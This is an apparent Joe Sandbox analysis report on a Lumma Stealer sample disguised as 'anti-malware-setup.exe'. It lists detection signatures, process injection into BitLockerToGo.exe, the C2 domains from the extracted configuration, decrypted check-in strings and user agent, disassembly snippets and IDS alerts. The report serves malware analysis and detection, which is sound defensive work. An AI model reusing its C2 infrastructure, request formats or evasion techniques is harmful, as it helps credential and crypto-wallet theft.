Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
anti-malware-setup.exe

Overview

General Information

Sample name:anti-malware-setup.exe
Analysis ID:1587433
MD5:fedb69af5de74d46366ad0570e77d9ac
SHA1:a85c8c91780e9366fafc2aba2d13e5b3a49c37ba
SHA256:61316bc78fb84aaa2d5fd1e10aec9a8cf96ab5ac7ee1436048eb7fd199045310
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to resolve many domain names, but no domain seems valid
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • anti-malware-setup.exe (PID: 4996 cmdline: "C:\Users\user\Desktop\anti-malware-setup.exe" MD5: FEDB69AF5DE74D46366AD0570E77D9AC)
    • BitLockerToGo.exe (PID: 6204 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["shapestickyr.lat", "manyrestro.lat", "curverpluch.lat", "tentabatte.lat", "talkynicer.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "enterwahsh.biz"], "Build id": "HpOoIh--bd4e81951306"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2322019566.000000000213A000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: BitLockerToGo.exe PID: 6204JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: BitLockerToGo.exe PID: 6204JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: BitLockerToGo.exe PID: 6204JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:28.390611+010020283713Unknown Traffic192.168.2.549770104.102.49.254443TCP
              2025-01-10T11:34:29.481329+010020283713Unknown Traffic192.168.2.549780104.21.48.1443TCP
              2025-01-10T11:34:30.467471+010020283713Unknown Traffic192.168.2.549787104.21.48.1443TCP
              2025-01-10T11:34:31.736399+010020283713Unknown Traffic192.168.2.549796104.21.48.1443TCP
              2025-01-10T11:34:33.191826+010020283713Unknown Traffic192.168.2.549805104.21.48.1443TCP
              2025-01-10T11:34:34.476499+010020283713Unknown Traffic192.168.2.561984104.21.48.1443TCP
              2025-01-10T11:34:37.015416+010020283713Unknown Traffic192.168.2.562001104.21.48.1443TCP
              2025-01-10T11:34:39.107891+010020283713Unknown Traffic192.168.2.562017104.21.48.1443TCP
              2025-01-10T11:34:40.315230+010020283713Unknown Traffic192.168.2.562024104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:29.915029+010020546531A Network Trojan was detected192.168.2.549780104.21.48.1443TCP
              2025-01-10T11:34:30.952361+010020546531A Network Trojan was detected192.168.2.549787104.21.48.1443TCP
              2025-01-10T11:34:40.780403+010020546531A Network Trojan was detected192.168.2.562024104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:29.915029+010020498361A Network Trojan was detected192.168.2.549780104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:30.952361+010020498121A Network Trojan was detected192.168.2.549787104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.695225+010020584801Domain Observed Used for C2 Detected192.168.2.5551491.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.673815+010020584841Domain Observed Used for C2 Detected192.168.2.5584831.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.592980+010020586081Domain Observed Used for C2 Detected192.168.2.5499191.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.636200+010020584921Domain Observed Used for C2 Detected192.168.2.5652831.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.646656+010020585001Domain Observed Used for C2 Detected192.168.2.5579911.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.623847+010020585021Domain Observed Used for C2 Detected192.168.2.5639761.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.658561+010020585101Domain Observed Used for C2 Detected192.168.2.5570351.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.684905+010020585121Domain Observed Used for C2 Detected192.168.2.5502671.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:27.613414+010020585141Domain Observed Used for C2 Detected192.168.2.5510231.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:35.105358+010020480941Malware Command and Control Activity Detected192.168.2.561984104.21.48.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-10T11:34:28.908331+010028586661Domain Observed Used for C2 Detected192.168.2.549770104.102.49.254443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://sputnik-1985.com/vAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apiAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/~Avira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/Avira URL Cloud: Label: malware
              Source: enterwahsh.bizAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/apiateAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com:443/apiAvira URL Cloud: Label: malware
              Source: https://sputnik-1985.com/U70Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 0.2.anti-malware-setup.exe.1dd0000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["shapestickyr.lat", "manyrestro.lat", "curverpluch.lat", "tentabatte.lat", "talkynicer.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "enterwahsh.biz"], "Build id": "HpOoIh--bd4e81951306"}
              Multi AV Scanner detection for submitted file
              Source: anti-malware-setup.exeVirustotal: Detection: 72%Perma Link
              Source: anti-malware-setup.exeReversingLabs: Detection: 71%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: enterwahsh.biz
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2320777741.0000000001C96000.00000004.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--bd4e81951306
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004165E4 CryptUnprotectData,3_2_004165E4
              Source: anti-malware-setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49780 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:61984 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62001 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62017 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:62024 version: TLS 1.2
              Source: anti-malware-setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: anti-malware-setup.exe, 00000000.00000002.2322019566.0000000002100000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then push edi3_2_0040C885
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53BABCE5h3_2_0040D307
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea eax, dword ptr [esi-000010AAh]3_2_00409B20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+7A8ED03Eh]3_2_00436C90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_0043BD70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+000001A0h]3_2_00409D39
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], cx3_2_004165E4
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea ecx, dword ptr [eax+0000520Ch]3_2_0040D5FD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea ecx, dword ptr [eax+0000133Bh]3_2_0042AF24
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 5C2B5D44h3_2_0043BFCD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004227F6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+00000274h]3_2_0042AF9F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042A855
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, dword ptr [ecx+esi*4-000009BCh]3_2_004088C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, ecx3_2_004258C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], dl3_2_004258C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [ecx-000051A8h]3_2_004258C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004278E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_004340E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041A8EF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [ecx+00001E9Fh]3_2_0041508C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+1Ch]3_2_0041508C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0041508C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [ecx-5F5E1539h]3_2_0043D090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 2213E57Fh3_2_004218B7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+00000128h]3_2_00417941
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [edx], ax3_2_00417941
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [ecx-5F5E1539h]3_2_0043D140
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, word ptr [esp+edx*2-000126A4h]3_2_0041695C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042C109
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h3_2_00437910
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, eax3_2_004029D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [ecx-5F5E1539h]3_2_0043D1D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, eax3_2_00405980
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebp, eax3_2_00405980
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_00429260
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2-7A433DC6h]3_2_0043B26F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, word ptr [ecx]3_2_00413A20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00421220
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ecx3_2_0041AAD8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0041E29F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 0985CAF0h3_2_0040E2A0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], bl3_2_0040CB05
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+00000086h]3_2_0042631D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, word ptr [esp+eax*2+14h]3_2_0042A322
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+10027EC6h]3_2_0041B3C6
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [esp+ecx*2+00000170h]3_2_0042C477
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_00428CD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+2Ch]3_2_004074E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]3_2_004074E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea ecx, dword ptr [eax+0000133Bh]3_2_0042B4E1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041ACF9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [ebx], cl3_2_0042ACBD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], al3_2_0041A541
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041A541
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+44h], 2EAF22BBh3_2_0042B5BB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esp+14h], ecx3_2_004205BC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx3_2_0043BE0A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2-5E87212Eh]3_2_00414620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+02h]3_2_0041AE87
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, word ptr [esp+eax*2+10027EC6h]3_2_0041AE87
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0043AE90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042A742
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebp+ebx+02h], 0000h3_2_00420F50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00420F50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 7F7BECC6h3_2_0043A770
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_00429700
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edi*8], E81D91D4h3_2_0043DF30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then lea edx, dword ptr [ecx-5F5E1539h]3_2_0043CF30
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, word ptr [esi+eax*2+54h]3_2_00419FDF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al3_2_00419FDF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_0040DFF5
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042A7AD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042A7BC

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:65283 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:50267 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:55149 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:63976 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:51023 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058608 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) : 192.168.2.5:49919 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:57991 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:58483 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:57035 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49770 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49780 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49780 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49787 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49787 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:61984 -> 104.21.48.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:62024 -> 104.21.48.1:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: shapestickyr.lat
              Source: Malware configuration extractorURLs: manyrestro.lat
              Source: Malware configuration extractorURLs: curverpluch.lat
              Source: Malware configuration extractorURLs: tentabatte.lat
              Source: Malware configuration extractorURLs: talkynicer.lat
              Source: Malware configuration extractorURLs: wordyfindy.lat
              Source: Malware configuration extractorURLs: bashfulacid.lat
              Source: Malware configuration extractorURLs: slipperyloo.lat
              Source: Malware configuration extractorURLs: enterwahsh.biz
              Tries to resolve many domain names, but no domain seems valid
              Source: unknownDNS traffic detected: query: curverpluch.lat replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: 53.210.109.20.in-addr.arpa replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: manyrestro.lat replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: enterwahsh.biz replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: talkynicer.lat replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: slipperyloo.lat replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: tentabatte.lat replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: shapestickyr.lat replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: bashfulacid.lat replaycode: Name error (3)
              Source: unknownDNS traffic detected: query: wordyfindy.lat replaycode: Name error (3)
              Source: global trafficTCP traffic: 192.168.2.5:61982 -> 162.159.36.2:53
              Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49780 -> 104.21.48.1:443
